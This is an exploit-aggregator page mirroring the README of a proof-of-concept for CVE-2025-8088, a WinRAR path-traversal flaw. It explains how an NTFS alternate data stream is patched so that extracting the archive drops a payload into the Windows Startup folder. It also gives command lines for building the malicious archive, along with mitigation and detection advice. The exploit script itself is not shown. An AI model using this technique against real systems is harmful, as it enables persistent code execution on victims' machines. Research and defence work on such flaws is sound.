CVE-2025-8088 PoC — Path traversal vulnerability in WinRAR

Source

https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC

Associated Vulnerability

Title:Path traversal vulnerability in WinRAR (CVE-2025-8088)
Description:A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.

Readme

# CVE-2025-8088 WinRAR Startup Folder Exploit Proof of Concept

![Windows](https://img.shields.io/badge/Platform-Windows-blue)
![Python](https://img.shields.io/badge/Python-3.7%2B-green)
![License](https://img.shields.io/badge/License-MIT-red)

A proof-of-concept exploit demonstrating **CVE-2025-8088**, a critical WinRAR vulnerability that allows arbitrary file write to the Windows Startup folder via path traversal in Alternate Data Stream (ADS) names.

---

## 📖 Overview

**CVE-2025-8088** is a security vulnerability in WinRAR that allows attackers to create specially crafted RAR archives that, when extracted, write files to arbitrary locations on the system.  
This PoC specifically targets the **Windows Startup folder** to achieve persistence and automatic execution of payloads.

---

## ⚠️ Disclaimer

> **This tool is for educational and research purposes only.**  
> Use only on systems you own or have explicit permission to test.  
> The authors are **not responsible** for any misuse of this tool.

---

## 🛡️ Affected Versions

- WinRAR versions **prior to 7.00 (build 10)**
- ✅ This vulnerability is patched in recent WinRAR updates

---

## 📋 Prerequisites

- Windows OS (**NTFS** file system required for ADS functionality)
- Python **3.7 or higher**
- WinRAR installed (`rar.exe` available in PATH or specified manually)

---

## 🚀 Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/your-username/CVE-2025-8088-WinRAR-Startup-Exploit.git
   cd CVE-2025-8088-WinRAR-Startup-Exploit
   ```

## 🎯 Usage

Basic usage with default parameters:

```bash
python cve-2025-8088-poc.py --decoy document.txt --payload script.bat
```

Advanced usage with custom parameters:

```bash
python cve-2025-8088-poc.py \
  --decoy "Important Document.pdf" \
  --payload "payload.bat" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out "malicious_archive.rar" \
  --workdir "C:\temp\exploit" \
  --placeholder_len 150
```

### Parameters

| Parameter           | Description                               | Default                         |
| ------------------- | ----------------------------------------- | ------------------------------- |
| `--decoy`           | Path to decoy file (created if missing)   | Required                        |
| `--payload`         | Path to payload file (created if missing) | Required                        |
| `--rar`             | Path to rar.exe                           | Auto-detected                   |
| `--out`             | Output RAR filename                       | `cve-2025-8088-startup-poc.rar` |
| `--workdir`         | Working directory                         | Current directory               |
| `--placeholder_len` | Length of ADS placeholder                 | Auto-calculated                 |

---

## 🔧 How It Works

1. **File Preparation** – Creates decoy and payload files if they don’t exist
2. **ADS Attachment** – Attaches the payload as an Alternate Data Stream to the decoy file
3. **Archive Creation** – Uses WinRAR to create a base archive containing the decoy with ADS
4. **Archive Manipulation** – Patches the archive to replace the ADS placeholder with a path traversal to the Startup folder
5. **Execution** – When extracted, WinRAR writes the payload to the **Startup folder** instead of the expected location

This exploit leverages **WinRAR’s handling of file streams** and **insufficient path validation** to achieve arbitrary file write.

---

## 🧪 Example Payload

A default payload is created if none exists:

```batch
@echo off
echo Hello World from Startup!
pause
```

> ⚠️ In real-world scenarios, this could be replaced with malicious code.
> For testing, we use a **harmless script**.

---

## 🛡️ Mitigation

1. Update WinRAR to the **latest version (7.00 build 10 or higher)**
2. Be cautious when extracting archives from **untrusted sources**
3. Regularly monitor the **Startup folder** for unexpected entries
4. Use security software capable of detecting **archive-based exploits**

---

## 📊 Detection

Security teams can look for:

* RAR archives containing **Alternate Data Streams**
* Archives with unusually long filenames containing **path traversal sequences**
* Files being written to the **Startup folder** from archive extraction processes

---

## 📚 References

* [CVE-2025-8088](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8088)
* [WinRAR Security Advisory](https://www.win-rar.com/singlenews.html?&L=0&tx_ttnews%5Btt_news%5D=174&cHash=abc123def456)
* [MITRE ATT\&CK: T1547.001 - Boot or Logon Autostart Execution](https://attack.mitre.org/techniques/T1547/001/)

---

## 🤝 Contributing

We welcome contributions to improve this PoC for educational purposes. Please ensure:

1. Your changes are **clearly documented**
2. You include **tests** where applicable
3. You follow **responsible disclosure practices**

---

## 📄 License

This project is licensed under the **MIT License** – see the [LICENSE](LICENSE) file for details.

File Snapshot


 [4.0K]  /data/pocs/3a7cd36136a52dd8dd244d8e8c2fdbf27a62f497
├── [9.1K]  main.py
└── [4.9K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!